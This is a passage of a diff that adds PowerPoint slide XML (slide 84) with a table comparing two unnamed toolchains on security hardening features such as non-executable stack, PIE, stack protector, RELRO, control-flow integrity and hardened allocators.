+              <a:tr h="366702">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+                        <a:t>Noexecstack</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="254780261"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="366702">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Full ASLR (PIE)</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1801720213"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="366702">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Stack Protector</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y (weak)</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1636600248"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="366702">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Safe Stack</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="86468879"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="366702">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Stack Clashing</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4019088140"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="527425">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>_FORTIFY_SOURCE=2</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3897187528"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="366702">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>STL hardening</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y (</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+                        <a:t>libstdc</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>++)</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3059881667"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="527425">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Hardened allocator</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="492283927"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="366702">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Full RELRO</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="654146900"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="366702">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+                        <a:t>Autoinitialization</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2180500840"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="527425">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Integer Overflow</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="120989246"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="366702">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" sz="1400" dirty="0"/>
+                        <a:t>Отключение оптимизаций</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4146659989"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="366702">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>CFI</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3025595264"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+            </a:tbl>
+          </a:graphicData>
+        </a:graphic>
+      </p:graphicFrame>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Slide Number Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB54BA1-1A2C-46CA-B92D-4456CBEF3D1B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>84</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="TextBox 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
